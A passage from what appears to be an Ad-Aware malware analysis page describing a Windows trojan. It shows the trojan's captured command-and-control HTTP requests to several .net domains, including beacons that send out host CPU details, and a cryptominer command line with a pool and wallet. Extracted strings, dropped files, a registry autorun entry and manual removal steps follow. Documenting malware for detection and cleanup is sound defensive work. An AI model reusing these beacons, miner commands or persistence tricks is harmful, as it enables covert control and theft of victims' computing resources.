n/" "0" "mail.yahoo.com" "middleevery.net" "/yahoo/" "/config/" "0" ";
.Þp_host% = "middleevery.net";.Þp_path% = "/dep/";.%no_password% =
 "0";.%timer% = "1200";.%cpuinfo% = "Intel(R) Core(TM) i7-4770 CPU @ 3
.40GHz (3392 MHz)";.%state% = "EN";.plugin.55106.miner_forced.166.win3
2mroclient.exe -a cryptonight -o mine.moneropool.com:5555 -u 45SEQEHgv
9QhVz48Sok1RxUDvP8p9E6YkgatUknv3Um4djPyAcFBcMP2X9QUizPjHACw3Nj3VBK2uhN
x7jUhB8XXQvqHBpa -p x.MZ......................@.......................
........................!..L.!This program cannot be run in DOS mode..
..$.........lg...4...4...4.?y4...4...4...49..4...4...4...4...4...4...4
...4...4...4RiHTTP/1.0 200 OK..Date: Fri, 23 May 2014 09:56:22 GMT..P3
P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR 
ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi P
UBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GO
V"..Content-Type: text/html..Age: 2..Server: YTS/1.20.28..ping.5.FLAG 
cfg.115."signarmy.net" "wifeknew.net" "groupcook.net" "watchstand.
<<< skipped >>>


GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce05 HTTP/1.0
Accept: */*
Connection: close
Host: mightglossary.net


HTTP/1.1 200 OK
Date: Fri, 23 May 2014 09:55:48 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2747
Keep-Alive: timeout=5, max=82
Connection: close
Content-Type: text/html; charset=UTF-8
<!--...top.location="hXXp://mightglossary.net/?fp=MkimZYzklgVed3rmj
wmncLCFCM8CfTY/LxoukoY9meL+C27oDN+Gz0DWS158kskOhD/ByjMYVpXSvMa
gXaLvJQ==&prvtof=WKCDQpQM0/h0N0N/JbyD5az+Dwo/6MjxgpwnN7Znl
8I=&poru=wUTW6BKOQqsCXBT7/JyAFtHlofU254glF3lF0KtuYRyAUHPyH+06+
m4OXEwy9WlqZc/Z2l2U5EZ8DBAEpjhL5JO1yzgadZ+rHBiBfDOirpxmidfKvnZvRrB
K3qnJWq/g8FAX/CmTbBCqpv7ovR1rEQ==&cifr=1&method=validate&mode=
sox&v=028&sox=3b93ce05";.../*..-->..<script type="text/javascrip
t">...<!--...dimensionUpdated = 0;...function applyFrameKiller()
...{....if(window.top != self)....{.....cHeight = 0;.....if( typeof( w
indow.innerHeight ) != 'undefined' ) {.....//Non-IE.....cHeight = wind
ow.innerHeight;.....dimensionUpdated = 1;.....} else if( document.docu
mentElement && ( document.documentElement.clientWidth || document.docu
mentElement.clientHeight )  ) {.....//IE 6  in 'standards compliant mo
de'.....cHeight = document.documentElement.clientHeight;.....dimension
Updated = 1;.....} else if( document.body && ( document.body.clientWid
th || document.body.clientHeight ) ) {.....//IE 4 compatible.....cHeig
ht = document.body.clientHeight;.....dimensionUpdated = 1;.....}.....i
f( cHeight <= 250 && dimensionUpdated == 1).....{......window.top.l
ocation = "hXXp://mightglossary.net/?fp=MkimZYzklgVed3rmjwmncLCFCM8CfT
Y/LxoukoY9meL+C27oDN+Gz0DWS158kskOhD/ByjMYVpXSvMagXaLvJQ==
&prvtof=obKbx2P6cvkbYGclYWRxD0AeqIldfsbh7f44bqp/yjE=&poru=YhvQXcIv
2YCazauhWXRe2KUsKU74XbYwFK4D4L6HORtykE5YbLIhH20CoCEJCaRZUOtv7wsM28
<<< skipped >>>


GET /forum/search.php?method=hostname&host=VVV.facebook.com&mode=sox&v=028&sox=3b93ce05&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: spendstudy.net


HTTP/1.0 502 Cannot find server.
Date: Fri, 23 May 2014 09:56:24 GMT
Server: YTS/1.20.28
Cache-Control: no-store
Content-Type: text/html
Content-Language: en
Content-Length: 2477
<HEAD><TITLE>Cannot find server.</TITLE></HEAD>
;.<BODY BGCOLOR="white" FGCOLOR="black">.<FONT FACE="Helvetic
a,Arial"><B>. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 
Final//EN"><html><head><style>a:link {font:8pt/11
pt verdana; color:red}a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style><meta HTTP-EQUIV="Content-Type" Content="text-html; c
harset=Windows-1252"><title>Cannot find server</title>&
lt;/head><body bgcolor="white"><table width="400" cellpadd
ing="3" cellspacing="5"><tr><td id="tableProps2" align="le
ft" valign="middle" width="360"><h1 id="textSection1"style="COLO
R: black; FONT: 13pt/15pt verdana"><span id="errorText">The p
age cannot be displayed</span></h1></td></tr>&
lt;tr><td id="tablePropsWidth" width="400" colspan="2"><fo
nt style="COLOR: black; FONT: 8pt/11pt verdana">The page you are lo
oking for is currently unavailable. The Web site might be experiencing
 technical difficulties, or you may need to adjust your browser settin
gs.</font></td></tr><tr><td id="tablePropsW
idth" width="400" colspan="2"><font id="LID1"style="COLOR: black
; FONT: 8pt/11pt verdana"><hr color="#C0C0C0" noshade><p i
d="LID2">Please try the following:</p><ul><li id="in
structionsText1">Click the Refresh button, or try again later.</
li><li id="instructionsText2"> If you typed the page addr
<<< skipped >>>


GET /forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz (3392 MHz)&mode=sox&v=028&sox=3b93ce05&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: spendstudy.net


HTTP/1.0 200 OK
Date: Fri, 23 May 2014 09:56:24 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28
.............



GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce05 HTTP/1.0
Accept: */*
Connection: close
Host: throughcountry.net


HTTP/1.1 200 OK
Date: Fri, 23 May 2014 09:56:07 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2715
Keep-Alive: timeout=5, max=124
Connection: close
Content-Type: text/html; charset=UTF-8
<!--...top.location="hXXp://throughcountry.net/?fp=z3o/78zez0czCE
wdSGRZrGXVQccPfBZhk6Ej0eOXGAknfRy0J6TQJzUSxfalqRqAmS3ZfWvQW0aI31E4J7ss
Fw==&prvtof=MwacIFcqZ1arAJRpEoizZ8Fr12qkfGJ+5cyo1dtzznk=&poru=
U5G0gsE5Q9BrYwAjMPbWEpWIG0IyO48gS/U6+SoGBJnuFIH2ShnJ8g4KZ42X54DJVX
pCaRtUuDSflTnWEw8kOp2IhJ1DwskPpOc2apnVsZIKLYrcSFbY+wUcPKZ6zgaRHkOF1B
wjxkn7pur4QqTm0A==&cifr=1&method=validate&mode=sox&v=028&sox=3b93c
e05";.../*..-->..<script type="text/javascript">...<!--...
dimensionUpdated = 0;...function applyFrameKiller()...{....if(window.t
op != self)....{.....cHeight = 0;.....if( typeof( window.innerHeight )
 != 'undefined' ) {.....//Non-IE.....cHeight = window.innerHeight;....
.dimensionUpdated = 1;.....} else if( document.documentElement && ( do
cument.documentElement.clientWidth || document.documentElement.clientH
eight )  ) {.....//IE 6  in 'standards compliant mode'.....cHeight = d
ocument.documentElement.clientHeight;.....dimensionUpdated = 1;.....} 
else if( document.body && ( document.body.clientWidth || document.body
.clientHeight ) ) {.....//IE 4 compatible.....cHeight = document.body.
clientHeight;.....dimensionUpdated = 1;.....}.....if( cHeight <= 25
0 && dimensionUpdated == 1).....{......window.top.location = "hXXp://t
hroughcountry.net/?fp=z3o/78zez0czCEwdSGRZrGXVQccPfBZhk6Ej0eOXGAknfR
y0J6TQJzUSxfalqRqAmS3ZfWvQW0aI31E4J7ssFw==&prvtof=E1vTOv7xFgpjhMpX
s8SPtI0w/sSrOQJQkAJG3sPqoxE=&poru=LCu2tvevGdZX7W4AQm5q18CFL5hw/T
stg3ba1uuM2/9ADQj2Xx1sJ5nYSb6+OQjrc2rYjLz+WDRPGU0w8e1scBox5d
<<< skipped >>>


GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce05 HTTP/1.0
Accept: */*
Connection: close
Host: rememberpaint.net


HTTP/1.1 200 OK
Date: Fri, 23 May 2014 09:55:58 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2593
Keep-Alive: timeout=5, max=112
Connection: close
Content-Type: text/html; charset=UTF-8
<!--...top.location="hXXp://rememberpaint.net/?fp=2BHPLgVpOmfswnLqn
bxJLBBYWuwDTVnUru+qi4d8oPxEddcvCnrbJNde5MULHUDY8t1IuaIopFRW5j6rYRnLz
A==&prvtof=iPFmR4XQT0XLnLosDEUFS4QCUJB5pqM0Uz7Xpb+KBJA=&poru=x
hBEVDczgwgtGs3ELApSQfd24RnBLOzw2s4kucOYD/34RGpj8D9rx5NQyCooWAaCZJ10W
7V7XiwWzIADatecbdEEi/8PKRJcWKZDCiTnXDiVRbteiJYG3mHSo4lZOwpd&cifr=1&m
ethod=validate&mode=sox&v=028&sox=3b93ce05";.../*..-->..<script 
type="text/javascript">...<!--...dimensionUpdated = 0;...functio
n applyFrameKiller()...{....if(window.top != self)....{.....cHeight = 
0;.....if( typeof( window.innerHeight ) != 'undefined' ) {.....//Non-I
E.....cHeight = window.innerHeight;.....dimensionUpdated = 1;.....} el
se if( document.documentElement && ( document.documentElement.clientWi
dth || document.documentElement.clientHeight )  ) {.....//IE 6  in 'st
andards compliant mode'.....cHeight = document.documentElement.clientH
eight;.....dimensionUpdated = 1;.....} else if( document.body && ( doc
ument.body.clientWidth || document.body.clientHeight ) ) {.....//IE 4 
compatible.....cHeight = document.body.clientHeight;.....dimensionUpda
ted = 1;.....}.....if( cHeight <= 250 && dimensionUpdated == 1)....
.{......window.top.location = "hXXp://rememberpaint.net/?fp=2BHPLgVpOm
fswnLqnbxJLBBYWuwDTVnUru+qi4d8oPxEddcvCnrbJNde5MULHUDY8t1IuaIopFRW5j
6rYRnLzA==&prvtof=Fqot8zq81xYUyze/94ruLPJYl8V25wfUUqcZfvfwYL4=
&poru=DDkvU68862i1GxhwTnu0Ir9RyGj14Ih4QgvtFHp9k6zzMVQgi3BlIY2WW3DIGE51
AI9Yezy1EY0OpslGsIcaUQ8mRg2zM7/kKpDiU4/PKeDnudchRD2QxGbUtBRGgk
<<< skipped >>>

The Malware connects to the servers at the folowing location(s):

hweynoxcrj.exe_3148:

.text
`.rdata
@.data
SSSh@
~LSSSh
~ZSSSh
-"3#?=2/2#
u3SSSh
t SSSh@
oG.wSf
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
AWS2_32.dll
OLEAUT32.dll
cmd.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
GDI32.dll
GetProcessHeap
KERNEL32.dll
GetKeyboardType
USER32.dll
GetCPInfo
GetConsoleOutputCP
hweynoxcrj.exe
kzu4.exe
hiovbxkmtrdw.exe
RO.AMoU
>eJ#.Wz
q.Cm3
A/%.d[?W
zH%Xa
2.EWp
FXI'%C
mn.JK
zcÁ
%Documents and Settings%\LocalService
|%System%\hiovbxkmtrdw.exe
|spendstudy.net
WATCHDOGPROC "c:\windows\system32\hweynoxcrj.exe"
%System%\hweynoxcrj.exe
mscoree.dll
KERNEL32.DLL

manmps2pohkzu4.exe_6060:

.text
`.rdata
@.data
SSSh@
~LSSSh
~ZSSSh
-"3#?=2/2#
u3SSSh
t SSSh@
oG.wSf
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
AWS2_32.dll
OLEAUT32.dll
cmd.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
GDI32.dll
GetProcessHeap
KERNEL32.dll
GetKeyboardType
USER32.dll
GetCPInfo
GetConsoleOutputCP
hweynoxcrj.exe
kzu4.exe
hiovbxkmtrdw.exe
RO.AMoU
>eJ#.Wz
q.Cm3
A/%.d[?W
zH%Xa
2.EWp
FXI'%C
mn.JK
zcÁ
%Documents and Settings%\LocalService
%WinDir%\TEMP\manmps2pohkzu4.exe
mscoree.dll
KERNEL32.DLL

hiovbxkmtrdw.exe_2392:

.text
`.rdata
@.data
SSSh@
~LSSSh
~ZSSSh
-"3#?=2/2#
u3SSSh
t SSSh@
oG.wSf
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
AWS2_32.dll
OLEAUT32.dll
cmd.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
GDI32.dll
GetProcessHeap
KERNEL32.dll
GetKeyboardType
USER32.dll
GetCPInfo
GetConsoleOutputCP
hweynoxcrj.exe
kzu4.exe
hiovbxkmtrdw.exe
RO.AMoU
>eJ#.Wz
q.Cm3
A/%.d[?W
zH%Xa
2.EWp
FXI'%C
mn.JK
zcÁ
%Documents and Settings%\LocalService
%System%\hiovbxkmtrdw.exe
mscoree.dll
KERNEL32.DLL


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    manmps2pohkzu4.exe:6060
    manmps1us2kzu4.exe:4980
    hweynoxcrj.exe:3148
    hweynoxcrj.exe:4308
    manmps1tunkzu4rilnmw.exe:2484
    manmps32eekzu4.exe:4484
    hiovbxkmtrdw.exe:3796
    hiovbxkmtrdw.exe:2392
    %original file name%.exe:536

  2. Delete the original Malware file.
  3. Delete or disinfect the following files created/modified by the Malware:

    %System%\yervcmzvvvzjvyg\tst (10 bytes)
    %System%\yervcmzvvvzjvyg\rng (60 bytes)
    %WinDir%\Temp\manmps32eekzu4.exe (35 bytes)
    %System%\drivers\etc\hosts (904 bytes)
    %System%\yervcmzvvvzjvyg\cfg (325 bytes)
    %System%\yervcmzvvvzjvyg\run (10 bytes)
    %System%\hiovbxkmtrdw.exe (6841 bytes)
    %System%\yervcmzvvvzjvyg\por (1 bytes)
    %WinDir%\Temp\manmps2pohkzu4.exe (6841 bytes)
    %WinDir%\Temp\manmps1us2kzu4.exe (35 bytes)
    %System%\yervcmzvvvzjvyg\ihst (224 bytes)
    %System%\yervcmzvvvzjvyg\etc (10 bytes)
    %System%\hweynoxcrj.exe (6841 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\manmps1tunkzu4rilnmw.exe (6300 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Microsoft Netlogon Smart Parental Foundation" = "%System%\hweynoxcrj.exe"

  5. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
    127.0.0.1 localhost
  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now